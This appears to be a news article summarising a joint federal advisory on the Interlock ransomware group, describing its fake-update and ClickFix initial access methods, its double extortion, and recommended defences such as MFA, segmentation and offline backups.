The Federal Bureau of Investigation (FBI), in collaboration with the Cybersecurity and Infrastructure Security Agency (CISA), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), has issued a critical alert regarding the intensified activities of the Interlock ransomware group. This group is known for its financially motivated attacks, targeting a diverse array of organizations, including essential critical infrastructure in North America and Europe. Their strategy incorporates a double extortion technique designed to exert maximum pressure on their victims.
Interlock ransomware was first identified in late September 2024, with investigations by the FBI revealing evolving tactics as recently as June 2025. The group’s malware not only targets Windows systems but also develops encryptors for Linux, focusing heavily on encrypting virtual machines. Notably, some open-source intelligence indicates parallels between Interlock and the Rhysida ransomware variant.
A distinctive feature of the Interlock group’s approach lies in their initial access methods, which set them apart from many of their peers. One such method involves ‘drive-by downloads’ from legitimate yet compromised websites, where they disguise harmful software as fake updates for widely used web browsers, including Google Chrome and Microsoft Edge, in addition to popular security tools like FortiClient and Cisco-Secure-Client.
Furthermore, Interlock employs a social engineering tactic labeled ClickFix, in which users are misled into executing malicious files through deceptive CAPTCHAs that instruct them to paste and run harmful commands in their system’s command line. This approach highlights the group’s capacity for manipulation, as it lures individuals into compromising their systems willingly.
Upon breaching a network, the ransomware utilizes tools such as Cobalt Strike and web shells to establish dominance, facilitate lateral movement, and extract sensitive information. They meticulously collect login credentials, including usernames and passwords, and may deploy keyloggers to capture keystrokes, enhancing their ability to exploit stolen data. According to a recent advisory, once the data is exfiltrated, Interlock encrypts the compromised systems, tagging files with extensions like .interlock or .1nt3rlock. Victims receive ransom demands without a specified amount, directing them to communicate through a .onion site on the Tor browser. The group has been known to follow through on threats to disclose stolen data if a ransom, typically sought in Bitcoin, is not paid.
To combat the threat posed by Interlock, federal agencies are urging organizations to adopt urgent security measures. These measures include reinforcing defenses to prevent initial access through DNS filtering and web firewalls, alongside educating staff to identify social engineering tactics. Additionally, organizations must prioritize keeping all operating systems, software, and firmware updated, specifically addressing known vulnerabilities. The implementation of strong authentication methods, such as multi-factor authentication (MFA), is critical as well as developing robust identity and access management policies.
Moreover, it is essential to establish network segmentation to contain ransomware spread and to maintain multiple offline immutable backups of all critical data to ensure effective recovery. Resources provided through the ongoing #StopRansomware initiative can assist organizations in fortifying their defenses against these evolving threats.
